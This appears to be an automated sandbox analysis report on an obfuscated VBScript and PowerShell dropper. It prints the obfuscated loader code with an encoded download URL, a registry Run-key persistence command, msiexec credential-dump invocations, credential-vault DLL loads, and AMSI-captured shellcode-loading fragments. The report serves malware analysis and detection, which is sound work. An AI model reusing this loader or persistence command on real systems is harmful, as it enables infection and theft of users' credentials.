Nd,5Fi,m. um0Kile Mi n(OverWSk,miNympn ashd FedoForfwFo.ssUna Cr mNAn iTHand Tild1Hith0Sard.Bela0U tr;Sene BrugWBut iblo nare 6Tred4Fo.l; Fir NedsxPhre6,nde4 Un,;Udfo Salmr J nvSpu : ini1I co3 End1Jagt.Llen0 Rep)Revi yntGd wneMillcansgkAviao Fly/ Agn2 ud 0Hand1Rici0Spr,0Dagb1 F s0 Uds1La.d troF JaciHjtirNedgeOpstfTarvoP.eixJoke/ Ag 1Cl i3 Kl,1Futh.Rigs0Kin. ';$Rrfabrikkernes=Nrigstes 'DenauS ans UnmeOprer oeb-ForlATr,oG UviE ov NPyreTOrys ';$Hucksterage=Nrigstes ' SmrhKaertBonut FilpKomms ab:Feld/Be y/Natat biboThyrtTanto L fpIndrlH.ana ArusSyvatPean. U ecUdvaos rem P o/Un.rrMedf5 Arb/Ar,tC SuroInfrsPrygtNonaiLgnafAng,oMi lrLukkmF rp.Spe oArchc Antx Tel ';$Oxeye=Nrigstes ' Omd>Bund ';$Tudsefisks33=Nrigstes ' AbrI PreERivaXKon ';$Tilplantet='Deutonephron';$Uncaps='\Cobblerism.Ace';Depending (Nrigstes 'Anat$ ProgS,efL Belo MazB ,nwAUns LObje: axiv nnESvumr TabDChinSDebaL,dlaIFanfGAfghsAf,eI Kopnsa,uDpeleEC urTte k=Anth$UnpieSolsn SmuvBipi:UndeaPreaPBo.sp .miDUfora IntT PolA Phr+ Bot$ OffuNonvNBlacC KolaS appMa pS ni ');Depending (Nrigstes ',ump$ U pgBemyLDepoO TurBProsaforelKas : pinL CaniMummmVandINut tDag aAntilAu,o=Perg$ Prih Af uTroccKrisKAerosPrjsTa beEKvadRK geA pingGr,ne Im.. Hjes.lleP FacLSlaniHag TSte (chiv$SlouoInkaxDul.EAffaYBl.eeTele)Anga ');Depending (Nrigstes ' kid[C.ntn nscENudeT Fyk. PicsUd leEmneRTaktvNo eiS.waC CamESpaspInteOKeywiI denfolktVignmmostAPi fNhistaDetaGCanaED srRG,la]Succ:Wa,h:wilfSA juEOmdeCKilluSjllrGramI WhiTVendyFordPTopsrFerrOS.ectDorioSubuc S eoEf eL Wa, Stol=Fode Bend[ ConNBryse.efet yvt.StatsEnlaepoddC VuruFinrr SvmiD cktp ery Si P FirrDistO RecTWimpo semCImpeoWindlGudsTCag YM topA,toePrel]Envi: agl:UdfrtRevilMatrsBack1 Viv2S mo ');$Hucksterage=$Limital[0];$Anmis=(Nrigstes ' lal$ GrugDem.l UnoOVertbTrykaSup LBusl:ExtaoGambvBasiE ParRHepaHSupeAPortESamgNLustG .xiTScot= Na.n TokePolyWSupe-NikoOSek BMat JThioEalpiCIntrT cay RevasScriYDents Bo TkonsEantimK.as..rhvnTetre palTPass.plotWSupeEDispBO prC FloLBiliI TydES,rgNP,nttLydi ');Depending ($Anmis);Depending (Nrigstes 'Valu$AlcoORakhvSaddemiserPla,h raya onseSem.nSoutg oultTand.Haa H bsceSupea usd TypeIndsrclumsUn o[H ma$ UniRAbelr igifSalgaConcbJeblrSkrli ,enk caJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Leavy" /t REG_EXPAND_SZ /d "%Ankomststationen% -windowstyle 1 $Ridendes=(gp -Path 'HKCU:\Software\Silently\').lyspen;%Ankomststationen% ($Ridendes)"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\hywcyvebel"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\hywcyvebel"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kscvygpustapv"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\uuhnryzwobsuytie"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Leavy" /t REG_EXPAND_SZ /d "%Ankomststationen% -windowstyle 1 $Ridendes=(gp -Path 'HKCU:\Software\Silently\').lyspen;%Ankomststationen% ($Ridendes)"Jump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1807185035.0000000007F00000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000006.00000002.1799974907.0000000006E29000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: stem.Core.pdb source: powershell.exe, 00000006.00000002.1799974907.0000000006E67000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: m.Core.pdbgf~& source: powershell.exe, 00000006.00000002.1799974907.0000000006E67000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell " <#Unappropriation smaamnterne Slaaenbrrene Forsgsarbejders Heiau #>;$Gaardvagters='Skvalderkaal';<#E", "0")
                Source: Yara matchFile source: 00000006.00000002.1809000343.000000000B184000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1789323939.0000000005761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1808651343.0000000008230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1668201842.00000196A8183000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Stokerfyrenes)$GlOBAl:maTerIAliSMs80 = [systEm.TEXt.EncODinG]::aScii.geTstRing($StOGy)$glOBal:PlasTIdome=$mATERIalisMs80.sUbsTrIng($tORTEReT,$NYkALkEt)<#organisationsarbejdets Rekvis
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((outpities $normaltilstanden $Beskikkede), (Decorticators189 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Roundoff = [AppDomain]::CurrentDomain.GetAssemb
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Claval)), $Subacuminationnagrammatizing).DefineDynamicModule($Preconspire, $false).DefineType($Hovedvgts, $Singularization, [System.Mu
